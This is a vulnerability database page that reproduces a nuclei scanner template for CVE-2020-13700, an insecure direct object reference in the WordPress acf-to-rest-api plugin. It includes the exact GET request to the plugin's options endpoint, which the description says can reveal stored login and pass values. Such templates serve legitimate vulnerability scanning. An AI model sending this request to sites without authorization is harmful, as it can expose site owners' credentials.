Lucene search
K

WordPress acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 47 Views

WordPresss acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference allows access to sensitive information like login and pass values

Related
Code
id: CVE-2020-13700

info:
  name: WordPress acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference
  author: pikpikcu
  severity: high
  description: |
    WordPress acf-to-rest-ap through 3.1.0 allows an insecure direct object reference via permalinks manipulation, as demonstrated by a wp-json/acf/v3/options/ request that can read sensitive information in the wp_options table such as the login and pass values.
  impact: |
    An attacker can exploit this vulnerability to access sensitive data, such as user information or administrative credentials.
  remediation: |
    Update the acf-to-rest-api plugin to version >3.1.0 or apply the latest security patches.
  reference:
    - https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5
    - https://wordpress.org/plugins/acf-to-rest-api/#developers
    - https://github.com/airesvsg/acf-to-rest-api
    - https://nvd.nist.gov/vuln/detail/CVE-2020-13700
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-13700
    cwe-id: CWE-639
    epss-score: 0.12955
    epss-percentile: 0.95842
    cpe: cpe:2.3:a:acf_to_rest_api_project:acf_to_rest_api:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: acf_to_rest_api_project
    product: acf_to_rest_api
    framework: wordpress
  tags: cve,cve2020,wordpress,plugin,acf_to_rest_api_project,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-json/acf/v3/options/a?id=active&field=plugins'

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - 'Content-Type: application/json'

      - type: word
        part: body
        words:
          - 'acf-to-rest-api\/class-acf-to-rest-api.php'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b70a7cd763d5820ed169ff459cd066aaa144f4912eacfe94cecb9fa024df00de02210087abaa378782b3b2c89f48331655fe48de514e30b126f25e82dae78367b44d29:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 25
CVSS 3.17.5
EPSS0.12955
47